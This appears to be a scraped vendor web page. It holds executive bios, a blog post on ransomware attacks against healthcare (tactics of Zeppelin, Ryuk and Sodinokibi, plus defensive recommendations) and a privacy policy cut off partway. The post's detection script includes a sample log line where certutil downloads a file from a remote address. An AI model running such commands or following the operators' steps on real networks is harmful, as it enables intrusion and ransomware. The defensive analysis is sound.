René is an executive-in-residence based in Battery's Menlo Park office. A 35-year technology-industry operating executive, he has had a front-row seat for most of tech's major transition points, working in senior executive roles at Silicon Valley companies including Ingres, Oracle, Business Objects, SAP, Salesforce and Palo Alto Networks. Most recently, before joining Battery, René, who got his start in technology when he founded a software business in his home country of the Netherlands in 1983, worked in senior executive roles at cybersecurity company Palo Alto Networks. He served as its founding chief marketing officer (CMO) for 10 years, growing the company from a tiny startup to one with nearly $3 billion in annual revenue. René also played a key role in the company's initial public offering in 2012 and served for a year as executive vice-president of strategic accounts. Before Palo Alto Networks, he was a senior vice-president at Serena Software, Salesforce.com and SAP, as well as CMO of Business Objects and a senior vice-president of worldwide marketing at VERITAS Software. Prior to that, René's experience was focused on databases. He joined Oracle Europe in 1992 as the company's international marketing lead; then, four years later, former CEO Larry Ellison convinced him to move to Silicon Valley. There, he ran marketing for Oracle's technology business, including the Oracle database and developer program, and developed Oracle's internal CRM stack. He joined Oracle from INGRES, where he ran European product marketing for eight years. His first software-development business, started in 1983, used the Ingres database system first developed at the University of California at Berkeley. Over the years, René has also carved out a niche as a go-to advisor for many startups, including Armis, Acronis, Bionic, Bitwarden, Nexthink and others.
René holds a degree in economics, with an emphasis on mathematics, from Amsterdam's Vrije Universiteit and speaks four languages. He is also a devoted Star Trek aficionado.
Dominic Orr
Board Member, Ordr
Dominic Orr has an impressive track record of leading some of the industry's most successful and innovative companies, taking them from venture-backed startups to high-valuation IPOs and acquisitions. Most recently, Dominic was President of Aruba Networks, an HPE company. Prior to Aruba's acquisition by Hewlett Packard Enterprise, Dominic served as the company's Chairman and CEO from an early-stage startup in 2006, through a successful public offering on the Nasdaq in 2007, through the HPE deal in 2015. Prior to Aruba, Dominic was president of the Personal Internet Group at Nortel Networks following its 2001 acquisition of Alteon WebSystems, an industry-leading network infrastructure company that Dominic led as Chairman and CEO from its beginnings in 1996 through the Nortel acquisition, including an historic Nasdaq IPO in 1999. Dominic has also served as a board director for a number of companies, including Chairman of the Board of Ruckus Wireless from 2004 to 2009. Dominic has a BS in Physics from the City College of New York, and a Master of Science and PhD from Caltech. Dominic received the Distinguished Alumni honor from Caltech in 2010.
Alex Doll
Founder & Managing General Partner, TenEleven Ventures
Alex is the Founder of Ten Eleven Ventures, the industry's first venture capital fund that is focused solely on investing in digital security. Alex has been in security, software and finance roles in Silicon Valley for over 20 years. He was the co-founder of PGP Corporation, serving as board member, COO, CFO and VP Business Development from 2002 until its sale to Symantec in 2010. He has continued his involvement with security companies as an angel investor, independent director, entrepreneur-in-residence at Khosla Ventures, and private equity firm consultant with KKR. Alex received his MBA from Stanford's Graduate School of Business and graduated cum laude from the University of Pennsylvania's Management & Technology program with a B.S. in Systems Engineering from the Moore School and a B.S. in Finance from the Wharton School.
Dharmesh Thakker
General Partner, Battery Ventures
Dharmesh joined Battery Ventures in 2015 to focus on early-venture and growth-equity investments in areas including cloud infrastructure, big data, security and next-generation enterprise applications. Prior to Battery, Dharmesh was a managing director at Intel Capital, where he led the firm's global cloud and big-data practice and made early- and later-stage investments in companies globally. Before joining Intel Capital, Dharmesh spent almost a decade in product management and go-to-market roles with enterprise-software companies like Keynote Systems, Manhattan Associates and two other startups, leading to their acquisition. In 2016, Dharmesh was named to the Forbes Midas Brink list of up-and-coming venture capitalists, and in 2018 he was included on Business Insider's 23 Top Venture Capitalists in Enterprise Tech list. A graduate of the University of Texas at Austin, where he received a BS in electrical engineering, Dharmesh also holds an MBA from the Wharton School of Business.
Peter Wagner
Founding Partner, Wing Venture Capital
As a founding partner at Wing Venture Capital, Peter led investments in dozens of early-stage companies, more than 25 of which have gone on to complete IPOs or successful acquisitions, including Nimble Storage, Redback Networks, Riverbed, Arrowpoint Communications, and Infinera. Before founding Wing, Peter helped lead Accel Partners for 15 years as Managing Partner. Peter holds an A.B. in Physics from Harvard College, summa cum laude, and an M.B.A. from Harvard Business School, where he was a Baker Scholar.
Gnanaprakasam Pandian
Chief Product Officer & Co-Founder
Pandian has more than 20 years of product and engineering leadership experience and is also a serial entrepreneur. Before founding Ordr, he was the Chief Development Officer at Aruba, responsible for all engineering and product management functions. Aruba, an enterprise mobile wireless company, was acquired by HPE for $3 billion in March 2015. Before Aruba, Pandian served as the head of engineering for Cisco's multi-billion-dollar Wi-Fi business unit and before that as VP of engineering for low-end switching product lines. He graduated with a master's degree in Electrical Engineering from IIT, Chennai, India and holds several patents in various networking technologies.
Healthcare Security
The Rise of Ransomware in Healthcare
Tactics, Techniques, Procedures and Recommendations of How to Triage
8 Min Read. By Jeff Horne
Perspective on the increase in ransomware attacks
Ransomware continues to make the headlines as researchers warn of a seven-fold increase compared to 2019. Healthcare is a very lucrative target, with attacks increasing by 350% in Q4 of 2019 (compared to Q4 2018) and continuing to rise through 2020. The pandemic provided a significant opportunity for any threat actor looking to target healthcare providers, as the focus narrowed from a holistic view of patient care, health outcomes, experience, revenue and security to health outcomes alone. In addition, there has been a mass influx of connected devices deployed in facilities without the proper purview of IT and security teams, leading to an incomplete asset inventory and no clear visibility into how and where devices are communicating.
Ransomware as a viable threat to healthcare organizations has led to sophisticated attackers running complex and targeted campaigns. The recent wave of ransomware campaigns looks more like a hands-on hack than an autonomous piece of malware propagating across the network. The operators behind the recent ransomware attacks are heavily incentivized to make sure their malware is extremely effective at propagating across diverse networks. We have seen simple pieces of malware like trojan droppers install remote control functionality and backdoors, which allow these ransomware operators to get onto the healthcare network and then run tools like Cobalt Strike to escalate their privileges to admin. Once admin privileges have been obtained, these ransomware operators begin turning off the malware detection and incident response programs on the infected devices. We've seen these operators use tools like Mimikatz to dump memory and gather local admin passwords or common user passwords on systems. Once common passwords have been gathered, the network is theirs for the taking. In organizations that use Remote Desktop Protocol (RDP) on workstations and servers, we've seen these compromised local administrator accounts used to install and distribute the ransomware. We've also seen these attackers run PsExec and PowerShell scripts remotely by mounting remote shares (like IPC$ and C$) using the compromised credentials. If local or commonly used credentials cannot be gathered from the initially infected host, we've seen them pivot to other hosts, or use common exploit kits to propagate throughout the network. These operators are skilled and, unfortunately, most healthcare providers and healthcare delivery organizations are trivial to compromise once these ransomware operators are inside.
Healthcare organizations that have vulnerable services on the edge of their network get compromised easily by autonomous scripts that are constantly scanning the internet. Once compromised, the script drops a payload that includes all of the tools the operators need for privilege escalation, exploitation, and lateral movement. Many healthcare organizations have flat networks, and utilize common local administrator accounts on largely unpatched systems. It is common to find legacy and largely unsupported operating systems like Windows XP running on both workstations and critical medical devices which cannot be patched and are running vulnerable services like SMBv1 that are available to the entire network. Simply put, once the initial compromise happens, it is largely trivial for these ransomware operators to infect an entire healthcare organization within a few hours.
Let's discuss the 3 most common ransomware campaigns that are targeting healthcare providers and healthcare delivery organizations and what their TTPs are:
Zeppelin
Brief Description:
The Zeppelin ransomware is believed to be operated by a Russian cybercrime group; however, very little is known about the operators. The initial infection code checks to make sure it will not infect machines located in Belarus, Kazakhstan, the Russian Federation, or Ukraine. The Zeppelin ransomware code is largely based on a purchasable ransomware variant known as VegaLocker, which is available on multiple hacking and ransomware-as-a-service websites and forums. The initial infections of Zeppelin began at the beginning of 2019.
What does a Zeppelin Compromise typically look like (TTPs):
- Typically, a spam or phishing email is received by an organization that includes an infected document that downloads and installs malware onto the system.
- Some initial infections appear to be Vidar spyware or the Cobalt Strike penetration testing toolkit.
- Recently the Zeppelin operators appear to be exploiting vulnerable RDP, Apache Tomcat, and Oracle WebLogic servers available on the internet.
- Once connected to the infected system, the operators will install PowerShell scripts and PsExec.
- In some Zeppelin instances a legitimate remote desktop application called ScreenConnect is initially installed (if it doesn't already exist). The Zeppelin operators will connect to the ScreenConnect service and install the PowerShell scripts, privilege escalation tools, and PsExec.
- The Zeppelin operators will run a set of PowerShell Anti-Anti-Virus scripts and turn off logging to prevent detection, and subsequently dump memory looking for local accounts that can be used to either propagate throughout the network or compromise the domain controller.
- Typically, the Zeppelin operators attempt to compromise the domain controller and, once compromised, they create a domain admin account to distribute the Zeppelin ransomware throughout the network.
- The domain admin account that is typically created is called "SQLSvc".
- If the domain controller is difficult to compromise, they attempt to distribute the Zeppelin ransomware using compromised credentials dumped from the memory of infected systems and propagate through file deployment and execution by PsExec.
- Once on the domain controller, they deploy a command to all connected devices to download Anti-Anti-Virus and Anti-Backup scripts along with the Zeppelin ransomware.
- The Zeppelin operators utilize the certutil command on Windows to download and infect machines with the scripts and ransomware.
- Finally, the scripts and Zeppelin ransomware are executed on all connected devices via PsExec.
Ryuk
Brief Description:
The Ryuk (aka Conti) ransomware is known to be operated by a Russian cybercrime group. The Ryuk ransomware was largely based on a previous ransomware codebase known as Hermes, which was possibly created by a North Korean hacking group and is purchasable from multiple hacking and ransomware-as-a-service websites and forums. The Russian cybercrime group started targeting healthcare organizations in late 2018.
What does a Ryuk Compromise typically look like (TTPs):
- A spam or phishing email is received by an organization that includes an infected document that drops a trojan downloader/bot that includes several tools for remote access, privilege escalation, and lateral movement.
- The Ryuk operators gain access to the Emotet/TrickBot-compromised machine, typically through a PowerShell script that launches a reverse shell that connects to the Ryuk operators.
- Once on the infected system, the Ryuk operators turn off all PowerShell logging and run Anti-Anti-Virus scripts to prevent detection.
- Common lateral movement, privilege escalation, and exploit kits are downloaded onto the infected machine.
- It is common for the Ryuk operators to utilize the PowerShell Empire post-exploitation kit.
- The Ryuk operators dump the infected machine's memory looking for local accounts that are used on workstations and servers throughout the network.
- If local credentials are not found, the operators will use common exploit kits.
- Lateral movement and infection happen either via RDP or through PsExec.
- Typically, the domain controller is targeted first and, if compromised, the domain controllers will typically be used to distribute the scripts and Ryuk ransomware to all connected users/computers.
- Anti-Anti-Virus and Anti-Backup/Recovery scripts are run on soon-to-be-infected machines in order to prevent both detection and recovery from the Ryuk ransomware.
- The Ryuk ransomware is deployed to all machines using PsExec, and a local service is created and started to run the Ryuk binary.
- The Ryuk operators sometimes oversee the infection to ensure that it is successful and, once infected, they start emailing employees informing them of the infection and asking them to reach out via an anonymous email address where payments are later discussed. The payment amounts typically vary depending on the size and the revenue of the organization that is infected.
Sodinokibi/Sodin/REvil
Brief Description:
Sodinokibi (aka Sodin, REvil) is another ransomware-as-a-service operation which started in April of 2019 and is believed to have been created and operated by the same Russian group behind the popular GandCrab ransomware. In early 2019 the Sodinokibi group is believed to have hired affiliate hackers with a guaranteed payment of $50,000 USD and a 60% to 70% cut of the revenue after payments were secured from victims. The developers of this ransomware regularly post updates and new functionality to their code. Once installed, Sodinokibi ransomware initially looks at the computer's language settings and will not infect if the set language is one used in most former Soviet Union or Middle Eastern countries. The Sodinokibi ransomware has been seen using several TTPs, including manual and automated drive-by compromises using spam/phishing attacks, common exploits, and previously compromised passwords.
What does a Sodinokibi Compromise typically look like (TTPs):
- It is difficult to describe the typical attack method used to deploy the Sodinokibi ransomware as there are several, which leads some security professionals to believe that Sodinokibi is being operated by multiple cybercrime organizations.
- Sodinokibi has been seen distributed as a spam or phishing email received by an organization that includes a heavily obfuscated malicious JavaScript containing PowerShell scripts that turn off logging, disable antivirus functionality, and ultimately install the Sodinokibi ransomware.
- The Sodinokibi operators also appear to be exploiting vulnerable WebLogic and RDP servers available on the internet.
- After the initial infection, the Sodinokibi operators drop various exploit and privilege escalation kits to move laterally throughout the network.
- Similar to Zeppelin, the Sodinokibi operators typically use the certutil command on Windows to download their scripts, exploit kits, and ransomware payload to infected machines.
- Once a system is infected with the Sodinokibi ransomware, the malicious binary deletes all file shadow copies on the infected system and disables recovery mode in order to ensure that the encrypted files cannot be restored from a local backup.
- The Sodinokibi ransomware includes persistence, Anti-Anti-Virus and Anti-Backup/Restore functionality, making the installation easy. This functionality makes it more autonomous for the operators, which is why we sometimes see Sodinokibi installed in simple drive-by attacks on vulnerable internet-facing servers and services.
One concerning tactic that most ransomware-as-a-service operators are starting to employ is to exfiltrate several important files from an infected organization and threaten to both publicly disclose the breach and publish the important documents on their blogs, typically hosted on the Dark Web. We've seen many ransomware operators publicly announce and release sensitive material for companies that did not pay the ransom.
Recommendations on using Ordr to Protect Against Ransomware
- Discover and identify your weak points
  - Identify devices running legacy versions of Windows that are running SMBv1 (such as Windows XP and Windows 7). The Ordr IoT Discovery Program allows you to quickly identify these devices. In Ordr's Rise of The Machines Report, we identified that 15-19 percent of our deployments had IoT devices running on legacy operating systems (Windows 7 or older).
  - Identify devices with known vulnerabilities, as attackers will try to exploit them. Use Ordr's built-in scanner or take advantage of our integration with vulnerability management solutions like Rapid7 and Tenable.
  - Identify high-risk and vulnerable devices that cannot be patched. Using Ordr's integration with WinRM, you can identify device operating systems and the status of patches.
- Enable proactive segmentation
  - Systems that cannot be patched need to be isolated. Ordr allows you to easily create segmentation policies that restrict devices to only the sanctioned communications required for their functions.
  - Work with Ordr and our firewall and networking infrastructure partners to enforce these segmentation policies in your existing infrastructure.
- Monitor for ransomware indicators
  - Identify anomalous communication using the Ordr Flow Genome. This can include discovery of sequential scans on the internal network, and anomalous SMB, RDP, and RPC communications utilized in lateral movement.
  - Alert on common exploits used in lateral movement, such as EternalBlue, and on known ransomware payload URLs.
  - Alert on common C2 communications to known ransomware payload servers; when infected machines reach out to these malicious sites, the Ordr product will alert on them.
  - Track user logon/logoff activities using Ordr. Our platform provides a mechanism to pull user logon and logoff activities from Active Directory and also track locally created users. This allows you to ensure the right users have access to vulnerable machines and identify any anomalous user accounts created within the network by threat actors.
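Several of the behaviours described in the TTP lists and in the monitoring recommendations above leave traces in standard Windows event logs: a new account such as "SQLSvc" being created and added to Domain Admins, certutil fetching a file from a remote URL, and a PsExec service being installed on a host. The following is an added example written for this page, not Ordr's code or product logic; it parses a handful of constructed event records (host names, user names and the 203.0.113.10 address are made up, and the key=value layout is an assumption) and raises alerts on those patterns. Event IDs 4688 (process creation), 4720 (user account created), 4728 (member added to a global group) and 7045 (service installed) are the standard Windows Security and System log IDs for these actions.

```python
import re
from collections import Counter
from typing import Dict, List, Tuple

# Constructed sample records (not real telemetry). One event per line as
# key=value pairs; values containing spaces are double-quoted. Host names,
# user names and the 203.0.113.10 address are made up for this example.
SAMPLE_LOG = """\
host=WS-0412 id=4688 user=CORP\\jdoe cmd="certutil.exe -urlcache -split -f http://203.0.113.10/zp.txt C:\\Users\\Public\\zp.txt"
host=DC01 id=4720 user=CORP\\svc_backup target=SQLSvc
host=DC01 id=4728 user=CORP\\svc_backup target=SQLSvc group="Domain Admins"
host=MED-CT-07 id=7045 service=PSEXESVC path="%SystemRoot%\\PSEXESVC.exe"
host=WS-0999 id=4688 user=CORP\\nurse1 cmd="notepad.exe C:\\shift-notes.txt"
host=DC01 id=4720 user=CORP\\hradmin target=jsmith
host=INFUSION-12 id=4720 user=INFUSION-12\\Administrator target=support
"""

# key=value, where the value is either a double-quoted string or a bare token
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_line(line: str) -> Dict[str, str]:
    """Parse one key=value record into a dict (quoted values keep their spaces)."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD_RE.finditer(line)}


def parse_log(text: str) -> List[Dict[str, str]]:
    """Parse every non-empty line of the log text."""
    return [parse_line(line) for line in text.splitlines() if line.strip()]


Alert = Tuple[str, str, str]  # (severity, host, description)


def detect(events: List[Dict[str, str]]) -> List[Alert]:
    """Flag the operator behaviours the post describes: certutil downloads,
    PsExec service installs, new accounts (SQLSvc in particular) and new
    Domain Admins members. Events are processed in order, so an account that
    is created and then immediately elevated is called out explicitly."""
    alerts: List[Alert] = []
    created = set()  # (host, account) pairs seen in 4720 events so far
    for ev in events:
        host, eid = ev.get("host", "?"), ev.get("id", "")
        cmd = ev.get("cmd", "")
        low = cmd.lower()
        if eid == "4688" and "certutil" in low and ("-urlcache" in low or "http" in low):
            alerts.append(("high", host, "certutil fetching a remote file: " + cmd))
        elif eid == "7045" and "psexesvc" in (ev.get("service", "") + ev.get("path", "")).lower():
            alerts.append(("high", host, "PsExec service installed (remote execution on this host)"))
        elif eid == "4720":
            account = ev.get("target", "")
            created.add((host, account))
            # The post names SQLSvc as the account Zeppelin operators create.
            sev = "high" if account.lower() == "sqlsvc" else "medium"
            alerts.append((sev, host, f"account '{account}' created by {ev.get('user', '?')}"))
        elif eid == "4728" and ev.get("group", "").lower() == "domain admins":
            account = ev.get("target", "")
            note = " (account was just created)" if (host, account) in created else ""
            alerts.append(("critical", host, f"'{account}' added to Domain Admins{note}"))
    return alerts


def summarize(alerts: List[Alert]) -> Dict[str, int]:
    """Count alerts per severity."""
    return dict(Counter(sev for sev, _, _ in alerts))


if __name__ == "__main__":
    found = detect(parse_log(SAMPLE_LOG))
    for sev, host, desc in found:
        print(f"[{sev.upper():8}] {host:12} {desc}")
    print(summarize(found))
```

On the constructed records the script raises six alerts and leaves the ordinary notepad process alone; the medium-severity account creations on the domain controller and the infusion pump host are the "locally created users" the last recommendation asks you to track, since only a review against expected administrative activity can tell a legitimate onboarding from an operator-created account.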
If you've already been attacked by ransomware, here are recommendations on how to deal with it, as described previously in this blog: A Primer on Preparing for and Responding to Ransomware for Users of IoT and IoMT. Note that for the ransomware examples in this blog, there are no decryptors available at this time.
If you have questions about ransomware protection, please contact us at info@ordr.net. We work with a number of excellent integrators and managed security providers who specialize in protecting healthcare and other industries that are heavily invested in the use of connected devices.
Jeff Horne
Jeff Horne is currently the CSO at Ordr, where he is responsible for security direction both within Ordr products and internal security. Prior to Ordr, Jeff was the VP of Information Security for Optiv, where he was responsible for all Security Operations, Governance Risk and Compliance, Endpoint, Internal Incident Response, Physical Security, and Employee Security Awareness groups. Before Optiv, Jeff was the Senior Director of Information Security for SpaceX, where he was responsible for the overall security strategy of SpaceX and managing the Information Security, Compliance (ITAR), Security Operations, and Physical Security groups. Previous to SpaceX, Jeff was the Vice President of R&D and Chief Architect for Accuvant LABS, where he managed teams of researchers and consultants specializing in reverse engineering, malicious code, incident response, breach analysis, and vulnerability assessment. Prior to Accuvant, Jeff was the Director of Threat Research at Webroot Software, where he led several teams of malware researchers, reverse engineers, and a development organization specializing in creating anti-malware functionality and detection signatures for all Webroot products. Jeff began his career as a Vulnerability Researcher at Internet Security Systems, where he was responsible for vulnerability discovery, exploit creation, IDS evasion research, and behavioral detection of malware. Jeff is well known for his insight in interviews for numerous news channels and publications, speaking roles at various security conferences, as well as authoring several vulnerability disclosures and patents.
Privacy Policy
Last Updated: May 26th, 2022
The Ordr Privacy Policy was updated on May 26th, 2022.
Ordr, Inc., its affiliates and subsidiaries (collectively "Ordr," "we", "our" or "us") knows you care about how your Personal Information is used and shared, and we take your privacy seriously. Please read the following to learn more about our Privacy Policy. By using or accessing Ordr's Website or by using any of Ordr's hosted products (the "Ordr Solution") or through communicating with Ordr regarding its software (the "Ordr Software") in any manner, you acknowledge that you accept the practices and policies outlined in this Privacy Policy, and you hereby consent that we may collect, use, and share your information in the following ways.
Changes to this Privacy Policy
Ordr may make changes to this Privacy Policy. The most current version of the Privacy Policy will govern Ordr's use of information about you and will be located at https://www.ordr.net/privacy-policy. If Ordr makes material changes to this Privacy Policy, Ordr will notify you by posting a notice on our website and may send an email to the address Ordr has on file for your account, if applicable.
This Privacy Policy explains:
- Our privacy policy was updated on May 26, 2022
- Changes to this privacy policy
- The type of information we collect
- How Ordr collects your information; tracking and cookies
- How Ordr uses your information
- Correcting and updating your information
- Consent to commercial electronic messages
- Rights to object or restrict processing of Personal Information
- Right to be informed of appropriate safeguards where personal information is transferred to a third country or to an international organization
- Who we may share information with
- How we handle "Do Not Track" requests
- Linked sites and Ordr solution
- Data security
- Retention of your information
- Notice of privacy rights to California residents
- Notice of privacy rights to residents of the European Economic Area
- How to contact us
Type of Information we collect
Ordr may collect information that you provide to Ordr in connection with your use of the Ordr Solution or the Ordr Software when you:
- Register your account with Ordr as a user of the Ordr Software or the Ordr Solution (including through registration as an employee, contractor or other user of the Ordr Software or the Ordr Solution on behalf of an Ordr customer ("Customer"))
- Make changes to your user profile information
- Send email messages, forms, or other information to Ordr or other users using the Ordr Solution or the Ordr Software, or
- Install, use or otherwise interact with the Ordr Solution.
This information may include your first and last name, your address, email address, telephone number, your location, and any additional information you provide to Ordr during the account registration process or via the Ordr Solution.
Ordr may also collect certain technical information about your use of the Ordr Solution. This technical information may include technical information about your device(s), browser type and version, geo-location information, computer and connection information, statistics on page views, traffic to and from the Ordr Solution, ad data, Wi-Fi connection information, internet protocol ("IP") address, and standard web log information.
Additionally, when expressing an interest in obtaining additional information about the Ordr Solution or the Ordr Software or registering to use the Ordr Solution or the Ordr Software, we or a Customer may require you to provide us with personal contact information, such as your name, company name, address, phone number, and email address ("Required Information"). Although Ordr uses third party service providers to process payments, when purchasing access to the Ordr Solution or the Ordr Software, we may require a Customer to provide our payment processing service providers with financial and billing information, such as billing name and address, credit card number, and the number of employees within the Customer that will be using the Ordr Solution or the Ordr Software ("Financial Information"). We may also ask an actual or prospective Customer to provide additional information, such as company annual revenues, number of employees, or industry ("Optional Information"). Required Contact Information, Billing Information, and Optional Information about Customers are referred to collectively as "Customer Data."
How Ordr Collects Your Information; Tracking and Cookies
When you register for an account with Ordr either directly or through a Customer, we may ask you to provide us with certain information in order to create your account, and to provide you with our Ordr Solution or the Ordr Software. This information is collected by us when you fill out forms that may be provided to you through the Ordr Solution.
Ordr, and third parties we interact with, including our third-party service providers, may use cookies, web beacons, hashed identifiers derived from email addresses for the purposes of cross-device tracking for targeted advertising, local shared objects (sometimes called "flash cookies"), and similar technologies in connection with your use of the Ordr Solution to provide and support the Ordr Solution (collectively referred to in this policy as "Cookies"). Cookies are small data files that may have unique identifiers, and reside, among other places, on your mobile device, in emails we send to you, and on our applications. Locally shared objects or "flash cookies" are data files that can be created on your computer by the websites you visit and are a way for websites to store information for later use. Locally stored objects are different than cookies because they are stored in different parts of your computer than cookies. Web beacons are small strings of code that provide a method for delivering a graphic image on a web page or in an email message for the purpose of transferring data.
If Cookies are used, they may be used to collect information about you and your use of the Ordr Solution, such as your browser type, preferences, data relating to content that has been displayed to you or that you have clicked on, and the date and time of your use. Cookies may also be used in order to further features and processes on the Ordr Solution, provide authentication and security for your transactions using the Ordr Solution, store your preferences, facilitate relevant advertising, and help us learn more about how users engage with the Ordr Solution.
We sometimes use service providers to help us provide certain products and services or to integrate other features. These third-party providers may collect information when you view or use them, including information about you and your device or browser. They may do this using Cookies or similar technologies. These third-party providers also may use these technologies to help share information with us, like how you use their website or application. To learn more about the information they collect or receive, review their privacy policies.
As part of using our Ordr Solution, Ordr's Customers may submit to Ordr electronic data or information ("Submitted Data") that constitutes personal information of other individuals. Such data may include an individual's name, email address, phone number or any other data that the Customer chooses to submit to us. Ordr generally has no direct relationship with the individuals to whom Submitted Data may pertain. Ordr processes Submitted Data on behalf of our Customers and any uses of Customer Data by Ordr are done so pursuant to our Terms and Conditions or a separate agreement in place between Ordr and the applicable Customer, which governs our treatment of Submitted Data.
How Ordr Uses Your Information
Ordr may use your information to:
- Provide access to the Ordr Solution to communicate with you
- Personalize, customize, measure, and improve Ordr's products, services, content, and advertising
- Prevent, detect, and investigate potentially prohibited or illegal activities or a breach of the applicable agreement(s) between you and Ordr
- Analyze the accuracy, effectiveness, and usability of the Ordr Solution or the Ordr Software
- Generate and review reports and data about Ordr's user base and Ordr Solution usage patterns
- Compile aggregate data for internal and external business purposes
- Resolve disputes and troubleshoot problems; and
- Contact you with information, including promotional, marketing, and advertising information and recommendations that Ordr believes may be of interest to you.
Consistent with applicable laws, including United States CAN-SPAM laws, if you do not wish to receive commercial emails, you may unsubscribe following the instructions on any email. We may still send you administrative notices, however.
We endeavor to protect the privacy of your account and other Personal Information we hold in our records, but unfortunately, we cannot guarantee complete security. Unauthorized entry or use, hardware or software failure, and other factors, may compromise the security of user information at any time. In particular, you acknowledge that Ordr is not responsible for any loss of any passwords or login information which you receive for access to the Ordr Solution which results from your failure to keep that information secure.
Correcting and Updating Your Information
Customers may update or change their account information through their account settings accessible using the Customer account page included in the Ordr Solution. Access to your Ordr account page will require your Ordr Solution username and password. To update your Information or to delete your account information, please email notices@Ordr.net.
You can access or change your profile and contact information or delete your account through the Ordr settings page. If you choose to delete or deactivate your account, you can no longer retrieve content or reactivate your account.
You have the right to request access to any Personal Information which Ordr may have about you by contacting notices@Ordr.com. The information will be provided in a machine-readable format. You may also ask that we transfer the Personal Information to a third party, which we will do if technically feasible.
You also have the right to review, add and update your Personal Information. You may also request the deletion of your Personal Information where:
- the personal information is no longer necessary in relation to the purposes for which it was collected or otherwise processed,
- you withdraw consent to Ordr's possession of the information on which the processing is based and where there is no other legal ground for Ordr's retention of the information,
- you object to Ordr's possession of the information and there is no overriding legitimate basis for the retention,
- the personal information has been unlawfully obtained or processed, or
- the personal information has to be erased for compliance with a legal obligation in the European Union or other law to which Ordr is subject.
When you update information, however, we may maintain a copy of the unrevised information in our records. Some information may remain in our records after your deletion of such information from your account. We may use any aggregated data derived from or incorporating your Personal Information after you update or delete it, but not in a manner that would identify you personally.
If your individual personal information has been submitted to us by a Customer as Submitted Data and you wish to exercise any rights you may have to access, correct, amend, or delete such data, please first inquire with the Customer (or his/her organization) directly.
Consent to Commercial Electronic Messages
If you provide us with an email address, you expressly consent to receiving Commercial Electronic Messages from Ordr about your use of the Website, the Ordr Solution, the Ordr Software and our Products. If you have any questions about Ordr's Commercial Electronic Messages, you can contact Ordr at:
Ordr, Inc.
2445 Augustine Dr.
#601
Santa Clara, CA 95054
Attention: Privacy Officer
or by emailing notices@ordr.net. In addition, you may opt out of receiving Commercial Electronic Messages at any time by emailing notices@ordr.net.
Rights to Object or Restrict Processing of Personal Information
If Ordr has your Personal Information as a result of your relationship with one of Ordr's Customers, you should first contact that Customer before contacting Ordr. You may, however, at any time revoke your consent to the collection, processing and use of your Personal Information by emailing notices@Ordr.net. Upon receipt of your request, Ordr will delete your personal data provided Ordr may retain any data which is required for billing and accounting purposes or which is subject to legal retention requirements. In addition, if you discover any errors in data, you may contact us by emailing notices@Ordr.net and we will correct it. You can always opt not to disclose information to us, but keep in mind some information may be needed to take advantage of product features or may be required by your relationship with one of Ordr's customers.
Right to be informed of appropriate safeguards where Personal Information is Transferred to a Third Country or to an International Organization
Ordr enters into agreements with its customers regarding the safeguards that have been put in place to protect your Personal Information for transfer outside of Switzerland or the European Economic Area. For transfers to countries without an adequacy decision by Switzerland or the European Commission, Ordr puts appropriate safeguards in place through contractual obligations.
Who We May Share Information With
Ordr may disclose the information we collect from you to the following third parties:
Users of the Ordr Solution; Public Information.
When you share information with us via the Ordr Solution, Ordr may share your information with other users, in accordance with the privacy settings you or the respective Customer has chosen for your account or that are applicable to that information. To the extent you share any information to a public audience or via a publicly accessible portion of the Ordr Solution such as an online customer community or forum, that information may be available to anyone who has access to that customer community or forum.
Ordr's Solution Providers.
Ordr may share your information with third-party contractors, agents, collaborators, or service providers who provide certain services to Ordr or on Ordr's behalf, such as operating and supporting the Ordr Solution. Ordr may also request your information from a previous service provider, which we need to provide our services to you. Alternatively, Ordr may pass on your information to a service provider that Ordr Customers have chosen to replace Ordr.
Companies that Acquire Ordr's Business or Assets.
If Ordr becomes involved in a merger, acquisition, sale of assets, securities offering, bankruptcy, reorganization, or dissolution or if the ownership of all or substantially all of Ordr's business relating to the Ordr Solution otherwise changes, Ordr may provide your information to a third party or parties in connection with the applicable transaction.
Ordr's Affiliates.
Ordr may share some or all of your information with Ordr's parent company, subsidiaries and corporate affiliates, joint ventures or other companies under common control with Ordr.
Ordr Customers.
If Ordr has received your information as part of Submitted Data, Ordr may share that information, or any modifications or revisions to that information, with that Customer.
Switching Ordr Solution Providers.
Ordr may request your information from your previous service provider, which we need to provide our services to you. Alternatively, Ordr may pass on your information to a service provider that you have chosen to replace Ordr.
Aggregate Information.
Ordr may share information relating to our visitors and users with affiliated or unaffiliated third parties on an aggregate basis; however, this information will not identify you personally.
Legal Requirements.
Ordr may share your information with law enforcement, governmental agencies, or authorized third parties, in response to a request relating to a criminal investigation or alleged illegal activity or any other activity that may expose Ordr, you, or any other Ordr user to legal liability, or to protect Ordr's rights or property, or during emergencies when safety is at risk. Ordr may also share your information in response to court orders, subpoenas, or other legal or regulatory requests, and Ordr may provide access to your information to Ordr's legal counsel and other consultants in connection with actual or potential litigation. Ordr shall remain liable under the Principles if its agent processes such personal information in a manner inconsistent with the Principles, unless Ordr proves that it is not responsible for the event giving rise to the damage.
How We Handle "Do Not Track" Requests
You may be able to adjust your browser settings or other settings so that "do not track" requests are sent to our websites and mobile applications. Ordr does not use any tracking technology that would respond to any "do not track" requests that are sent to our services. Ordr does not collect personally identifiable information about your online activities over time and across different websites when you use the Ordr Solution; however, certain service providers that use Cookies may collect your personally identifiable information over time and across different websites.
Linked Sites and Ordr Solution
Ordr's website or application may, from time to time, contain links to and from the websites of our partner networks, advertisers and affiliates. If you follow a link to any of these websites, please note that these websites have their own privacy policies and that we do not accept any responsibility or liability for these policies. Please check these policies before you submit any personal data to these websites.
Data Security
Ordr takes reasonable measures to protect the information you provide to Ordr or submit through the Ordr Solution against misuse, loss, theft, unauthorized use, disclosure, or modification. Unfortunately, the transmission of information via the internet is not completely secure. Although we will do our best to protect your personal data, we cannot guarantee the security of your data transmitted to our site; any transmission is at your own risk and your information may be disclosed to third parties in unforeseeable situations or situations that are not preventable even when commercially reasonable protections are employed, such as in the case that Ordr or the Ordr Solution is subject to a hacking or other attack. Once we have received your information, we will use strict procedures and security features to try to prevent unauthorized access.
Retention of Your Information
We retain information about you only for as long as it is necessary and relevant for Ordr's operations, and for Ordr's customers to work with their consumers. Information about you that is no longer necessary and relevant for Ordr's operations will be disposed of securely. Ordr may also retain information collected from you to comply with the law, prevent fraud, resolve disputes, troubleshoot problems, assist with any investigation, and take other actions permitted by law or disclosed in this Privacy Policy.
Notice of Privacy Rights to California Residents
